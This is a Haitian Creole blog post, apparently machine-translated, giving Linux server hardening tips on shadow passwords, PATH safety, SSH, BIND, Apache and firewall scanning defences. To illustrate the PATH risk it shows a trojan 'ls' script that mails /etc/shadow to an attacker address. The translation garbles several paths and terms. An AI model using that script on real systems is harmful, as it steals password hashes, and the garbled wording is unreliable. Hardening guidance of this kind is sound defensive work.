Konsèy Sekirite pou Linux ou (sèvè) (Pati 1)

Mwen pa pibliye anyen sou blog la pou yon tan long e mwen ta renmen pataje kèk konsèy ki soti nan yon liv ki, (Pami lòt moun). Mwen te jwenn li nan Inivèsite a epi mwen jis li e byenke li onètman yon ti jan demode ak teknik yo montre yo trè fasil pou yo travay bay evolisyon nan sistèm lan, yo menm tou aspè enteresan ki ka montre. 9788448140502

Mwen vle klarifye ke sa yo se konsèy oryante nan yon sistèm Linux ki itilize kòm yon sèvè, sou yon mwayen oswa petèt gwo echèl bay sa nan nivo itilizatè Desktop, byenke yo ka aplike, yo pa ta trè itil.

Mwen sonje tou ke yo se senp konsèy rapid epi mwen pa pral antre nan anpil detay, byenke mwen planifye fè yon lòt pòs pi plis espesifik ak vaste sou yon sijè patikilye. Men, mwen pral wè sa pita. An n kòmanse.

Règleman modpas. 

Malgre ke li son tankou yon slogan, li te gen yon politik modpas bon fè diferans ki genyen ant yon sistèm vilnerab oswa ou pa. Atak tankou "fòs brital" pran avantaj de gen yon modpas move jwenn aksè nan yon sistèm. Konsèy ki pi komen yo se:

  • Konbine majiskil ak miniskil.
  • Sèvi ak karaktè espesyal.
  • Resansman.
  • Plis pase 6 chif (èspere ke plis pase 8).

Anplis sa a, kite a konsidere de dosye esansyèl.  / elatriye / passwd ak / elatriye / lonbraj.

Yon bagay trè enpòtan se ke dosye a / elatriye / passwd. Anplis ban nou non itilizatè a, uid li, chemen katab, bach .. elatriye. nan kèk ka li montre tou chiffres kle itilizatè a.

 Ann gade nan konpozisyon tipik li yo.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

itilizatè: cryptkey: uid: gid: path :: path: bash

Pwoblèm reyèl la isit la, se ke dosye patikilye sa a gen otorizasyon -rw-r - r– ki vle di ke li te li autorisations pou nenpòt ki itilizatè sou sistèm lan. epi ki gen kle a chiffres se pa trè difisil yo Decoder yon sèl la reyèl.

Se poutèt sa dosye a egziste / elatriye / lonbraj. Sa a se dosye a kote tout kle yo itilizatè yo estoke, pami lòt bagay. Fichye sa a gen otorizasyon ki nesesè pou okenn itilizatè pa ka li li.

Pou ranje sa a lè sa a, nou dwe ale nan dosye a / elatriye / passwd ak chanje kle a chiffres nan yon "x", sa a pral sèlman sove kle a nan dosye nou an / elatriye / lonbraj.

desdelinux:x:500:501::/home/usuario1:/bin/bash

Pwoblèm ak PATH la ak .bashrc ak lòt moun.

Lè yon itilizatè egzekite yon lòd sou konsole yo, kokiy la sanble pou lòd sa a nan yon lis repèrtwar ki genyen nan varyab anviwònman PATH la.

Si ou tape "eko $ PATH" nan konsole a li pral pwodiksyon yon bagay tankou sa a.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Chak nan dosye sa yo se kote kokiy la ap gade pou kòmandman an ekri pou egzekite li. Li "." sa vle di ke katab la premye nan rechèch se katab la menm ki soti nan kote lòd la egzekite.

Sipoze gen yon itilizatè "Carlos" ak itilizatè sa a vle "fè sa ki mal." Itilizatè sa a te kapab kite yon dosye ki rele "ls" nan katab prensipal li, ak nan dosye sa a egzekite yon lòd tankou:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

Men, si itilizatè a rasin pou bagay sa yo nan destinasyon an, ap eseye lis dosye yo andedan folder nan carlos (jan li premye sanble pou lòd la nan ki folder menm, inadvèrtans li ta dwe voye dosye a ak modpas yo nan imèl sa a ak Lè sa a, dosye yo ta dwe ki nan lis epi li pa ta jwenn jiskaske trè ta.

Pou evite ke nou dwe elimine "." nan varyab la PATH.

Nan menm fason an, dosye tankou /.bashrc, /.bashrc_profile, ./.login yo ta dwe verifye epi tcheke si pa gen okenn "." nan varyab la PATH, ak an reyalite soti nan dosye tankou yon sèl sa a, ou ka chanje destinasyon an nan yon lòd espesifik.

Konsèy ak sèvis:

SHH

  • Enfim vèsyon 1 nan pwotokòl la ssh nan dosye a sshd_config.
  • Pa pèmèt itilizatè rasin lan konekte nan ssh.
  • Dosye yo ak dosye ssh_host_key, ssh_host_dsa_key ak ssh_host_rsa_key yo ta dwe sèlman li pa itilizatè a rasin.

MOUN

  • Chanje mesaj akeyi nan dosye named.conf la pou li pa montre nimewo vèsyon an
  • Limite transfè zòn, epi sèlman pèmèt li pou ekip ki bezwen li.

Apache

  • Anpeche sèvis la montre vèsyon ou nan mesaj akeyi a. Edite dosye httpd.conf la epi ajoute oswa modifye liy yo:  

ServerSignature Off
ServerTokens Prod

  • Enfim otomatik Indexing
  • Configured Apache pa sèvi dosye sansib tankou .htacces, * .inc, * .jsp .. elatriye
  • Retire paj man oswa echantiyon nan sèvis la
  • Kouri Apache nan yon anviwònman chrooted

Rezo Sekirite Sosyal.

Li esansyèl pou kouvri tout antre posib nan sistèm ou an soti nan rezo ekstèn lan, men kèk konsèy esansyèl pou anpeche entru soti nan optik ak jwenn enfòmasyon ki soti nan rezo ou.

Bloke trafik ICMP

Pare-feu a dwe configuré pou bloke tout kalite trafik ICMP fèk ap rantre ak sortan ak repons eko. Avèk sa ou evite ke, pou egzanp, yon scanner ki ap chèche pou ekipman ap viv nan yon seri IP pral lokalize ou. 

Evite TCP eskanè ping.

Youn nan fason yo analysis sistèm ou a se TCP ping eskanè an. Sipoze ke sou sèvè ou a gen yon sèvè Apache sou pò 80. Antris la te kapab voye yon demann ACK nan pò sa a.Avèk sa, si sistèm lan reponn, òdinatè a pral vivan epi yo pral eskane rès la nan pò yo.

Pou sa, firewall ou ta dwe toujou gen opsyon "konsyantizasyon eta a" epi yo ta dwe jete tout pake ACK ki pa koresponn ak yon koneksyon TCP oswa sesyon deja etabli.

Kèk konsèy adisyonèl:

  • Sèvi ak sistèm IDS yo detekte eskanè pò nan rezo ou.
  • Configured Firewall pou ke li pa mete konfyans pò anviwònman yo sous koneksyon.

Sa a se paske kèk analiz itilize yon "sous" pò sous tankou 20 oswa 53, depi anpil sistèm mete konfyans sa yo pò yo paske yo te tipik nan yon ftp oswa yon dns.

REMAK: Sonje ke pi fò nan pwoblèm ki endike nan pòs sa a te deja rezoud nan prèske tout distribisyon aktyèl yo. Men, li pa janm fè mal pou gen enfòmasyon kle sou enkonvenyan sa yo pou yo pa rive ou.

REMAK: Pita mwen pral wè yon sijè espesifik epi mwen pral fè yon pòs ak enfòmasyon pi plis detaye ak aktyèl.

Thaks tout moun pou lekti.

Bonjou.


Kontni an nan atik la respekte prensip nou yo nan etik editoryal. Pou rapòte yon erè klike sou isit la.

Yon kòmantè, kite ou

Kite kòmantè ou

Adrès imèl ou pa pral dwe pibliye. Jaden obligatwa yo make ak *

*

*

  1. Responsab pou done yo: Miguel Ángel Gatón
  2. Objektif done yo: Kontwòl SPAM, jesyon kòmantè.
  3. Lejitimasyon: konsantman ou
  4. Kominikasyon nan done yo: done yo pa pral kominike bay twazyèm pati eksepte pa obligasyon legal.
  5. Done depo: baz done anime pa rezo Occentus (Inyon Ewopeyen)
  6. Dwa: Nenpòt ki lè ou ka limite, refè ak efase enfòmasyon ou yo.

  1.   enfòmatik diro

    Mwen te vrèman renmen atik la e mwen enterese nan sijè a, mwen ankouraje w kontinye telechaje kontni.